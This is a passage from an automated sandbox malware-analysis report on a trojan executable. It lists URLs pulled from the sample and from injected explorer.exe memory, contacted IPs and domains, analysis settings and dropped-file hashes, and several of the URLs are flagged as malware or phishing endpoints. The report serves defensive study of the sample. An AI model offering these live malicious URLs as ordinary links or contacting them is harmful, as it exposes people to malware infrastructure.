                                  http://www.fontbureau.com/designersGH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/?H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bTheH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jovam.xyzReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.verifyaxcx.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.deutscheno1.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.pbcgotv.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.piertrafesa.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.yannickrast.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tiro.comH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.dasmonica.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.goodfont.co.krH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.kailibianminwang.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.typography.netDH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.agengrosirfashion.com/u1p5/www.dasmonica.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://fontfabrik.comH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.agengrosirfashion.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.apeutah.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.hokabrazil.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        http://www.freeclothesonline.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.vinewineltd.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fonts.comH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.rhoads-music.com/u1p5/www.verifyaxcx.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sakkal.comH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.hokabrazil.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          http://www.yannickrast.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.agengrosirfashion.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.comH4vBtZsi8xAKaMm.exe, 00000001.00000002.340265098.0000000001987000.00000004.00000020.00020000.00000000.sdmp, H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.vinewineltd.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.fontbureau.comFH4vBtZsi8xAKaMm.exe, 00000001.00000002.340265098.0000000001987000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.verifyaxcx.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.vzn2aai2qj.icuexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cnH4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.hornnbach.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.deutscheno1.com/u1p5/www.yannickrast.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.commH4vBtZsi8xAKaMm.exe, 00000001.00000002.340265098.0000000001987000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.kailibianminwang.com/u1p5/.explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.hornnbach.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.vzn2aai2qj.icu/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.deutscheno1.comexplorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.rhoads-music.com/u1p5/explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.vexplorer.exe, 0000001E.00000003.568649594.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.565231882.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.567907070.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.deutscheno1.comReferer:explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  192.0.78.24
                                                  		marymarinho.comUnited States
                                                  		2635AUTOMATTICUSfalse
                                                  92.222.235.170
                                                  		bettingweb365.comFrance
                                                  		16276OVHFRfalse
                                                  107.180.34.104
                                                  		shitcoin.teamUnited States
                                                  		26496AS-26496-GO-DADDY-COM-LLCUSfalse

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:562156
                                                  Start date:28.01.2022
                                                  Start time:15:14:32
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 15m 49s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:H4vBtZsi8xAKaMm.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:42
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@9/1@8/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 65.3% (good quality ratio 59.3%)
                                                  • Quality average: 71.4%
                                                  • Quality standard deviation: 32%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240s for rundll32

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.3.108.67, 20.82.209.183, 8.248.143.254, 8.253.95.120, 8.253.207.121, 8.241.126.121, 8.248.133.254, 20.199.120.182, 20.199.120.151, 80.67.82.211, 80.67.82.235, 40.91.112.76, 20.54.7.98, 40.112.88.60, 20.199.120.85, 204.79.197.200, 13.107.21.200, 51.104.136.2
                                                  • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wus2-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.ne
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  15:16:07API Interceptor1x Sleep call for process: H4vBtZsi8xAKaMm.exe modified
                                                  15:17:18API Interceptor450x Sleep call for process: explorer.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\H4vBtZsi8xAKaMm.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1314
                                                  Entropy (8bit):5.350128552078965
                                                  Encrypted:false
                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.905438661946074
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
